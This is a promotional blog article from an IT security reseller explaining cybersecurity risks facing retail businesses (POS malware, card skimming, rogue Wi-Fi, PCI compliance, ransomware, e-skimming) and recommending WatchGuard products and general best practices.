There are few things more difficult than building a retail business. Not only because of the countless variables it involves, but because changes in consumer habits have forced the sector to digitize: and this transformation has made it the new "sweetheart" of cybercrime.
If you promise not to be alarmed, I will give you a brief presentation of the current state of affairs:
- In 2020 alone, of all the cyberattacks that occurred worldwide, 24% targeted the retail sector;
- 77% of retail businesses were targeted by at least one ransomware attack in 2021an increase of 75% from the previous year;
- The retail sector was the second most affected by ransomware in 2021only behind the media, leisure and entertainment industry;
- Among business owners surveyed, 92% say the attacks have affected their ability to operate and 89% say they have lost business or revenue following the attack.;
"Retail continues to suffer from one of the highest rates of ransomware attacks recorded across industries. With more than three in four businesses expected to suffer an attack in 2021, surely incidents of this kind are now a matter of 'when' rather than 'if'. "- Chester Wisniewski, Research Scientist at Sophos
Of course there is a case for turning attention to this topic, the problem is that any entrepreneur in the retail sector has his head flooded with questions related to:
- Stock management;
- Hiring, training and administration of human resources;
- Costs of energy, new equipment, space, people and systems;
- Prices, supply and growth (even more so in the face of fluctuating commodity prices);
- Building trade relationships that allow product to be sold;
- Customer satisfaction - now also online!
And that's just to name a few!
Between paperwork, meetings and family, the hours in the day aren't enough to do even half of what needs to be done. You rush through the day and one day you arrive at the office to find that a cyber-attack has cut off your access to files and equipment critical to the running of the company!
Beware: studies indicate that 87% of customers would not do business with a company that has suffered a data breach. Remember that the effects of an attack go far beyond immediate consequences like lost revenue!
To prevent this from happening, let's find out:
- Why retailers are attacked more than other sectors
- What risks a retailer should be aware of
- How the most common types of attack affect retailers
- How to spot danger before you are attacked
- Best practices: 7 rules you should follow from today onwards
I'll give you what you need so that your company doesn't join the already long list of victims in the Portuguese business sector. Are you ready?
Why are retailers (more) attacked?
It's important to understand why your type of business is such a target for hackers: because that's when you'll understand what a cybercriminal is looking for when they break into your systems.
Shall we start at the beginning?
Retail businesses are storing increasing amounts of customer data, including credit card numbers. This type of information is a valuable element, which can be sold on the notorious dark web.
But we don't stop there. The growing use of the cloud and mobile apps are taking your business online. And that in itself is not a bad thing: it's a way forward, helping you to lower costs and increase the responsiveness of your business. But it also opens up new threat vectors.
Are we going to fall on concrete?
Nowadays, many retail companies are a hybrid between physical and online stores. This nature requires the use of several technologies simultaneously: for example, POS in physical stores and cloud payment systems in eCommerce. It is from these technologies that serve new consumer habits that new threat vectors emerge:
- Cloud botnetswhere cybercriminals infect and control multiple computers on your system and can even rent access to your customers' data to third parties;
- NFC paymentsNFC payments: the famous contactless, which customers love and so do criminals - because they have found ways to intercept the data exchanged between devices and ATM machines, to sell it or use it without consent;
- Software-level vulnerabilities: remember that manufacturers are concerned with making their software perform a certain task; not with protecting your system.
- Lack of P2PE encryption in POS systems: in short, it is an algorithm that, at the exact moment of a physical purchase, transforms your credit card information into an unreadable and inaccessible code for the criminal;
- Use of insecure third-party plugins: it could be a plugin as simple as a free program to change the color of your website's payment page - and be corrupted or a decoy that actually responds to a cybercriminal!
But because I know these buzzwords mean little to you - and because I really want this article to be accessible - I've put together a list of the most common risks a retail business faces and the solutions that can protect you.
Come with me!
Retail: what cybersecurity risks should I be aware of?
We've teamed up with our partner WatchGuard to show you the risks a retailer faces and then explain what solution you should invest in to mitigate the chances of falling into that trap.
When the goal is to steal money, the cybercriminal will look to hack into your POS or Point of Sale. Typically, the process involves placing malware on a vulnerable system, in order to capture customer payment information.
Some criminals develop their own malware, but in the vast majority of cases it is easy to find such malware on the notorious dark web. And the moment the cybercriminal is in possession of several credit cards, the whole criminal network gets to work:
- Some people buy and sell card numbers;
- Some people produce counterfeit cards;
- There are recruiters who find people to make purchases with fake cards;
- And finally, there are people who do the actual shopping!
To stop this whole row from breaking out with your customers' data, to their detriment and to your company's reputation, you can start with a simple solution:
Single-factor authentication, such as a password, is not a sufficient precaution to avoid this risk: you must boost your POS security levels with a two-factor authentication process.
In the video below, our commercial director Manuel Alves explains in an uncomplicated way how this technology works, within the reach of any company:
WatchGuard experts explain that "to reduce the likelihood of network disruptions and data loss from stolen credentials, AuthPoint utilizes a Push message, QR code or one-time password (OTP) as an additional factor for anyone accessing the system to prove their identity."
"A critical step in securing access to valuable data on the network is implementing MFA or Multi-Factor Authentication. WatchGuard's AuthPoint goes beyond traditional two-factor authentication and considers innovative ways to identify users seeking to access the network."- WatchGuard on Cybersecurity in Industry 4.0
But the solutions don't stop there. Read on to find out how to apply a second layer of security against attacks on your POS.
To monitor your POS environment, WatchGuard recommends using a hawk tool: Dimension. This cloud-based solution accompanies WatchGuard's UTM firewall and offers automated reporting tools that identify security threats for you.
Problems, trends or suspicions: there are over 100 reports and dashboards that you can automate to be delivered to you by email.
Remember to separate the network where your POS connects from the general network where customers and employees browse social media and open email. This practice is called network segmentation and all WatchGuard firewalls support it.
Let's go back to the video of our commercial director Manuel Alves to discover, in a simple way, how this technology works, within the reach of any company:
WatchGuard experts explain that "segmenting your network (IIoT, Guest WiFi, corporate network, etc.) helps isolate critical devices from other traditional equipment, such as desktops. This limits the destructive spread of an attack, should it happen.
Network segmentation can be easily accomplished with a UTM firewall like WatchGuard's Firebox T35-R - designed to protect networks in harsh environments, withstanding dust, moisture and extreme temperatures."
Now that you know three ways to protect your business from POS intrusions, let's look at the second risk a retailer typically faces: payment card theft.
If POS system intrusions amount to a kind of robbery through the back door, card theft is a crime through the front door, with the help of a locksmith. Here, the cybercriminal implants a physical theft device into a piece of store equipment that reads magnetic cards.
And you're wrong if you think this only happens to the most inattentive: we even see processes as meticulous as tiny cameras positioned to capture PIN codes!
Ready to learn how to avoid this risk?
When it comes to equipping your business or when it's time to renew equipment, opt for terminals that are resistant to data theft. Tools that make it harder for the criminal to process will make it less likely for hackers to collect cardholder information.
➡️ Want to avoid card fraud? Find out what signs to look out for
Frequent monitoring of surveillance videos and stickers on terminal portals, although classic processes, are two excellent ways to start protecting yourself.
But for technology solutions that truly look after the security of your POS systems, we recommend using WatchGuard's Total Security Suite: which combines several security services to offer multi-level protection against malicious POS software.
[Video 1 - WatchGuard's Total Security Suite: How it can be useful for retailers]
Very important: training your employees to know how to detect if there has been a tampering process is also key. Integrate the practice into the entire team's processes as a regular task!
Now that you know three ways to protect your business from POS intrusions and two solutions to prevent card theft in your establishment, let's look at the third risk you as a retail business owner may face.
You know this better than I do: customers today demand WiFi in shops. It enables not only a longer customer stay in the storebut also streamlines functionalities - such as contactless payment - that lead you to sell more.
Providing an internet connection is seemingly easy. But securing it and ensuring that it does not become a threat to the prosperity of your business is a more demanding challenge.
The convenience that a WiFi network offers to your customers also gives cybercriminals a new gateway. An example: when a cybercriminal places an AP or Access Point in the vicinity of your store and your customers start connecting. The result of this vulnerability is one of two scenarios:
- Or the cybercriminal gains access to these customers' data;
- Or plant malware on your devices, to run when they connect to a secure network - like your business network!
Let's learn how to mitigate this risk with simple processes, within reach of any company.
Before thinking that danger is just around the corner, let's focus on what's important: the customer. And for them, we need to ensure fast connection speeds across a wide physical area, without compromising network security levels.
If we look at WatchGuard solutions, the AP125, AP325 and AP420 models are suitable for indoor retail environments. The rugged AP327X is ideal for outdoor deployments, as it extends secure Wi-Fi connection in shopping centers, markets, tourist attractions and other larger spaces.
If you already offer fast WiFi to your customers, the next step is to make sure you're not giving away their data to cybercriminals.
WatchGuard's WIPS detects and classifies all access points and connected devices - such as tablets or smartphones - and ensures that unacceptable connections are disabled immediately.
It controls all access points in the authorized airspace, without illegally disrupting neighboring WiFi networks. This means that if there is a school in the neighborhood, you don't run the risk of accidentally disabling that WiFi, just because your system didn't recognize it!
So far, you've figured it out:
- Three ways to protect your business from POS intrusions;
- Two solutions to prevent card theft in your establishment;
- Two tools to manage access to the WiFi network.
Not yet: it's time to learn about the fourth and final risk that every retail entrepreneur faces....
...and most of them are completely oblivious to this issue!
I know: you'd probably rather go do the half marathon than worry about more protocols... But did you know that there is a Payment Card Industry Data Security Standard?
It is a set of rules that businesses must follow when they decide to accept credit card payments (online and offline). But beware: only 39% of small and medium-sized enterprises are compliant!
The consequences of failing the PCI standards vary:
- Fines between 5 and 100 thousand dollars per month;
- Banks may increase your fee per transaction;
- Or worse: suspend collaboration with your company!
To help: I'm going to give you four quick tips that will teach you how to ensure your company is one step closer to maintaining PCI compliance.
If you're looking for a new UTM terminal, find one that provides defense in depth - which, in practice, translates into the use of multiple layers of security. These include measures such as:
- Content filters
- Malware analysis
- Intrusion Prevention
These measures are implemented in several layers of defense, each with its own specific function. But they all work together to protect the system against external threats!
➡️ Looking for a terminal that meets these requirements? Click to find out
If you're used to following our Facebook or Instagram, you've probably heard of Multi-Factor Authentication. But did you know that, especially in the retail sector, regulations are getting stricter about adopting this system?
Practical example: PCI DSS 3.2 Requirement 8.3 made the use of MFA mandatory for access to computers and systems containing sensitive cardholder information. Translated in a nutshell.
...if your business accepts credit card payments, two-factor authentication has become the minimum requirement for the in-store computers that store this information!
Remember that WatchGuard's MFA - AuthPoint™ - is one of the solutions that can help you become PCI compliant. The system goes far beyond two-factor authentication and can help you protect not only your store's computers, but:
- Cloud Applications
- Internal networks
In the image above, you can observe a real situation of someone who received a message on their smartphone to authorize a login made on a fixed computer. Simple and safe, above all!
It's yet another of the PCI requirements and involves regular maintenance to ensure that no security holes develop over time. And while it's true that WatchGuard can make the process easier, with a tool called IU Web...
...remember to ask a technology partner for helpif you don't know much about these types of configurations!
For the curious: the Web UI is a security device that protects a company's network from external threats. It is shaped like a red box - the famous Firebox. Which, via the browser, gives us access to security features such as firewalls, VPNs or protection against spam and viruses:
In addition, WatchGuard's Web UI allows network administrators to monitor network traffic, peek at reports and run diagnostics for security issues. For those who want to take on the configuration of their Firewalls themselves, the process will involve steps such as:
- Internal and external intrusion testing
- Documentation of settings
- Network diagram with card data flow
- Implementation of anti-spoofing method
Remember that you can pay a monthly fee for setting up firewalls on company computers that store card data. But even if you want to manage the process yourself - and to avoid fines - what you should not do is accept card payments and neglect this layer of protection!
As a business owner in this sector, it is normal that you are "obliged" to process cardholder data - because people use less and less physical cash. But it's one thing to process data, it's quite another to store it....
...storing data represents an additional set of standards and challenges that you must be prepared to respond to!
Now, one of the quickest ways to achieve PCI compliance is to take storage out of the equation and simply not store. If there is an absolute need to do so:
- Enable strong encryption for all stored data.
- Remember that only people inside the company who really need it should have access to this database and each one should have their own unique credentials (yes, the most used password in the world is still 1234546)!
But beware: talking about specific threats such as PCI compliance or credit card theft does not mean that retail lives on the sidelines of common threats such as traditional forms of phishing or ransomware....
Is retail also a target of the most common attacks?
Being aware of specific forms of attack does not mean neglecting the basic care that any entrepreneur should take. I don't want to go into detail on this issue, but I want to make sure that as an entrepreneur you are alert to the risk of:
While there are various forms of phishing, the most common typology is crystal clear: the cybercriminal sends a fake email that appears to come from a legitimate source. You - or an employee of your company - click on a link or download a malicious attachment...
...and the rest is history: the attacker can now steal information stored on your computer or browser, or install other forms of malware to cause even more damage to the victim of the cyberattack!
💡 The solution
A good starting point is to keep security software, operating systems and browsers up to date. Remember that a consultation with an IT specialist can help you identify additional security measures!
Let's talk about the elephant in the room: most IT networks in retail businesses have vulnerabilities. And the cybercriminal takes advantage of them and encrypts systems in order to paralyze the business until someone pays the ransom.
The list of jobs in Portugal that have already been targeted by ransomware attacks is hard to believe, to say the least:
- Sport Lisboa e Benfica
- Portuguese Sea and Atmosphere Institute
- Record Newspaper
- Correio da Manhã
- Jornal de Negócios
- Sábado Magazine
The victims are even more but you can avoid joining the list as long as you embrace the practices we share throughout this article!
💡 The solution
It's far from perfect: but a good antivirus, tailored to your company's operational process, can offer real-time protection against ransomware!
🚨 Data breach
I've already shared with you that customer data, particularly credit card data, is a valuable item in underground markets. And to hack into your company's system and steal them, the criminal doesn't even need to resort to phishing or ransomware...
...if the company does not use multi-factor authentication, all you need to do is to be in possession of stolen credentials to enter the system and take as much as the stolen access allows you!
Worse, companies shouldn't assume that the only people interested in stealing data are out of doors. According to the Verizon 2020 DBIR report, 30% of data breaches that occurred during 2020 involved internal staff.
💡 The solution
To mitigate this risk, you need a 360 strategy that involves: anitvirus on the endpoint, properly configured firewall, DDoS mitigation, regular audits and internal training of your employees - not forgetting frequent data backup!
🚨 Attacks on IoT devices, payment systems and other technologies
In retail, numerous entrepreneurs are investing in NFC technologies - the famous contactless - or others, such as Venmo or Cash App, to process payments. The idea gained popularity during the pandemic and the idea was to eliminate physical contact, to avoid contagion...
...but obviously cybercriminals took advantage and, in 2020 alone, 9 out of 10 of the most exploited vulnerabilities targeted IoT devices like this one. Remember that the solution is to use P2PE encryption!
💡 The solution
🚨 Advanced Persistent Threats or APT
Technological progress has provided the retail entrepreneur with useful tools to save costs, make life easier for the customer and increase the quality of the service provided. Many have taken the ride and ended up:
- Adopt more cloud services
- Implementing more complex IT systems
- Networking between geographically distant points of sale
Positive? Of course
But this transformation means that many of these companies have increased their digital footprint. And they have therefore expanded the available attack surface, which makes it harder for the criminal to detect and more likely that APTs will preserve illicit systems for longer.
💡 The solution
Adopt proactive protection measures such as perimeter defense with advanced threat detection and response services.
🚨 Attack on the supply chain
Companies in this sector - especially those working with e-commerce - involve several suppliers in their operation. This happens with almost all of them, from the multinational to the small business owner using drop shipping.
All it takes is one vulnerable access point at just one of these suppliers and the supply chain is at risk: both the sales system itself, the management of the operation and your customer's secret data.
💡 The solution
Preventive measures such as regular third-party risk assessment can help you identify weaknesses. If you want to go further, hire an endpoint security service to monitor events, scan for threats, detect malware and virus intrusion or identify suspicious behavior!
In this article, we have already talked about the importance of being PCI compliant. The bad news is that online buyers and sellers are not always protected against fraud, even if they are compliant.
Thanks to e-skimming, the criminal places a cloning code on payment card processing pages in online stores. The code captures credit card and other sensitive data.
"This threat has impacted e-commerce companies in the retail, entertainment, and travel industries as well as utility companies and third-party vendors; it is also commonly targeting third-party vendors such as those who provide online advertisements and web analytics."- CISA, Cybersecurity and Infrastructure Security Agency
💡 The solution
Browse on devices with up-to-date antivirus and anti-fraud software. That way you can prevent your data from being stolen online. And of course: look for antivirus or network protection that enables DNS protection for all users.
🚨 DDoS attacks
DDoS is an acronym that translates to Distributed Denial of Service and occurs when a cybercriminal sends multiple requests to a particular network resource - such as a website - exhausting its ability to respond.
In 2021, this type of crime increased by 200%, month after month, especially due to the fault of the Meris botnet. With or without Meris, the truth is that the retail sector was the one that suffered the most monthly attacks, with the majority (61.6%) targeting North American companies.
💡 The solution
With the help of a firewall managed by some of the world's most trusted providers, such as Cisco, you'll enjoy a kind of barrier protection for unwanted network traffic.
🚨 Credential Stuffing
It's a cybercrime tactic that boils down to using typical username and password combinations across multiple websites. And anyone who thinks it's uncommon is mistaken: a study by Help Net Security reveals that during 2021 there was a 98% increase in this type of attack compared to the previous year.
The explanation is simple: your customers reuse login credentials across multiple accounts, so if the cybercriminal obtains a password and username via phishing, he can use them on multiple websites - and even make unauthorized purchases with the same access as much as he wants.
💡 The solution
Use a secure credential manager such as KeePass or Bitwarden.
Allow me to refocus on the central subject of this article; this is the state of play: you already know the risks but, until a problem arises, you have no idea how to assess whether danger is approaching...
...but that is about to change!
Cybersecurity in retail: how to spot the danger?
If you've been alarmed by the amount of risk your business is subject to and want to ensure you do everything you can to avoid problems, I'll help you know where to start.
There are nine questions that any cybersecurity expert will ask you when they question you about your company's cybersecurity levels. Ask them to yourself, and follow the trail that any top expert usually follows:
1 - "What do you use to protect your network and your stores?"
Most security solutions should be replaced every three years. So, after assessing whether it even exists, he will look to see if he needs to update it or if the update deadline is approaching. Like him, you can do this exercise.
Remember to confirm with your service provider that your cybersecurity solution covers the full extent of your supply chain: from current threats - such as typical forms of ransomware - to future challenges posed by upcoming growth.
2 - "Explain to me how you manage the systems of all the stores."
Services like WatchGuard's System Manager allow you to manage the IT of multiple geographically distant stores from a single central point. With it, you can create multiple security models to simplify and centralize the administration process.
The cybersecurity expert knows that your business is more vulnerable if the various stores in the chain have autonomy in terms of defense. An unprotected computer or an untrained operator is enough for the cybercriminal to penetrate and your customer's data is at risk.
3 - "Are you concerned about installing security in new branches or the challenges of replacing outdated security systems periodically?"
The cybersecurity expert knows that entrepreneurs deal with real problems. And that lack of care is often related to simple problems like lack of time. When considering a new cybersecurity system, consider how easy it is to handle and keep it up to date.
Remember that WatchGuard has created a simple deployment process called RapidDeploy: it allows you to remotely equip branches with up-to-date security systems and configure them remotely, eliminating the need for physical visits.
4 - "Does the current security solution help maintain PCI compliance?"
Some cybersecurity systems provide periodic reports on the system's PCI compliance. Remember that the standards associated with PCI are constantly being updated and it will make your life easier if you set up automations to avoid being subject to fines.
Very important: in each branch, the network security system must be able to separate point-of-sale traffic from corporate traffic. This is one of the many PCI requirements, which the cybersecurity system must be able to guarantee.
5 - "Is the current security solution enterprise-grade or in common use?"
Although the principles are similar, a cybercriminal will not attack a business in the same way as they will attack you. Ensure you use advanced malware protection, web content filtering, intrusion prevention services and the full range of tools that provide a secure business network.
6 - "Do you offer WiFi to your customers and store visitors?"
Businesses in the retail sector are under increasing pressure from customers, employees and suppliers to offer fast and secure internet access. If this is the case for you, ensure your WiFi system is PCI compliant, allows network segmentation and generates regular security reports.
7 - "On a scale of 1 to 10, how secure is your guest WiFi network?"
A cybersecurity expert knows that the airspace of a retail business is often invaded by unauthorized devices - which generate data interception and denial of service attacks. Be prepared for this reality.
WatchGuard's WIPS system is one that safeguards network access points from unauthorized intrusion. Go even further with WatchGuard's Firebox to control the batch of zero trust applications that will protect you against specific forms of malware.
8 - "Can you manage the WiFi networks of all branches from a central point?"
Installation, configuration, monitoring and troubleshooting: the chosen network management system should be prepared to be administered from a central point. Do not allow a complex process such as WiFi network management to be conducted arbitrarily by local managers.
In operation, the chosen enterprise WiFi system, managed from the cloud, should allow you to resize the network specifically for different locations; and give you the opportunity to select specific settings for each grouping: be it a building, floor or specific room.
9 - Is your WiFi system a source of income?
Once security is established, it's time to put the systems to work for you. Captive portal tools can help you turn the connectivity of a WiFi network into richer experiences for customers, guests and employees - with targeted offers, news and promotions.
A simple wireless network can help you build the database your marketing team needs and be a powerful source of loyalty with stakeholders who are in the habit of visiting your physical locations.
It's likely that asking yourself these nine questions has set off some alarm bells. Don't worry. In the next section I will reveal the 7 practices to avoid being attacked. Use these pointers as a kind of checklist.
How to avoid being attacked: retail cybersecurity best practices
If you didn't have the patience to read the whole article and simply want to find out what you should do, you are in the right place. Enjoy: at the end of the list, I have added a downloadable image with the seven best practices you should follow.
- Encrypting sensitive data
Credit card numbers should not be retained by you - but if retention is mandatory, ensure that data is encrypted, whether it is stored or in transit. To balance the need for privacy with ease of use, homomorphic homomorphic encryption is often used.
- WiFi network segmentation
Keep POS data, PII and other customer financial information secure. Remember that network monitoring tools should look for signs of lateral movementAPTs and breach attempts.
- Regular backups
Minimize the potential for data loss after a ransomware or phishing attack. They happen. Safeguard data from your eCommerce site, POS system and other critical applications in your supply chain. Automate this process.
- Network-wide Anti-Malware
Cover the full extent of your retail business and cover any geography. This should include securitypatches on all software and applications used on the shop floor.
- Multifactor Authentication (MFA)
Protect yourself against phishing attacks or account hacks. If your e-commerce is already a reality, remember to use a platform that complies with the Credit Card Industry Data Security Standard (PCI-DSS).
- Zero Trust Access
The approach Zero Trust Access controls a user's identity and access, a bit like "I trust no one". It grants secure remote access to applications, data and services to individuals - not an entire network, as VPNs do.
- Team Training
In the last two years, according to IBM, insider threats in the retail sector have grown by 38%. What's more, 81% of malicious breaches start with compromised passwords. No doubt about it: training your employees is one of the best strategies to increase your company's cybersecurity.
I have a business in the retail sector: where to start?
If you're interested in some of these tools and fear for the security of your business's supply chain, check out what our founder Nuno Diniz told some of the retail entrepreneurs who have become our customers:
If you prefer a free online assessment, remember that you can schedule a 30-minute online meeting with one of our experts!